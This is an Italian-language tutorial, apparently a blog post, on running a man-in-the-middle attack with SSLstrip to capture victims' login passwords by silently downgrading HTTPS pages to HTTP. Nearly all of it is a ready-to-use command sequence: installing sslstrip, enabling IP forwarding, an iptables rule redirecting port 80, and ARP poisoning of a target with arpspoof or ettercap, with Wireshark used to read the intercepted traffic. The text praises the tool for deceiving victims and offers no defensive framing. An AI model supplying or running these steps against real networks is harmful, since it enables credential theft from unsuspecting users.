Non so se avete mai portato un attacco di tipo MITM (man in the middle). Lo spoofing delle password (ad esempio dei vari account mail) risulta difficoltoso in quanto le pagine di login viaggiano praticamente tutte over SSL. Cosa succede quando una macchina a cui viene spoofato il traffico tenta di loggarsi ad esempio su hotmail? Semplice, il browser ci avverte che il certificato non è affidabile, e che probabilmente siete spoofati! Adesso molti ignoreranno il messaggio e accetteranno il certificato fasullo ma chi dotato di un minimo di intuito non ci caschera’. C’è una soluzione: l’utilizzo di SSLstrip .

Questo splendido, meraviglioso tool presentato al Black Hat DC 2009 si occupa di effettuare un hijack in modo trasparente del traffico HTTP di una (o piu’) vittime, se viene effettuata una richiesta HTTPS viene effettuato un redirect rimappando la URL come HTTP, lasciando tutto il resto praticamente invariato e quindi ingannando molto piu’ facilmente la vittima dato che il pop-up del falso certificato non verrà mostrato.

Requisiti:

• Python >= 2.4 (apt-get install python)
• Il python “twisted-web” module (apt-get install python-twisted-web)

Installazione

• tar zxvf sslstrip-0.7.tar.gz
• cd sslstrip-0.7
• sudo python ./setup.py install

Configurazione:

• Attiviamo il forward dei pacchetti in modo da fargli attraversare la nostra SpoofingBox. (echo "1" > /proc/sys/net/ipv4/ip_forward)
• Configuriamo IPTables in modo da redirectare tutto il traffico HTTP sul socket di sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <$listenPort>)
• Lanciamo sslstrip. (sslstrip.py -l <$listenPort>)  come porta ($listenPort) usatene una alta a vostro piacere.
• Lanciamo il poisoning attraverso arpspoof . (arpspoof -i <interface> -t <targetIP> <gatewayIP>) o ettercap se preferite. (ettercap -i <interface> -T -q -M arp /1 <gatewayIP>/ /<targetIP>/).

Wireshark a questo punto vi mostrerà un sacco di cose interessantissime

That’s all folks!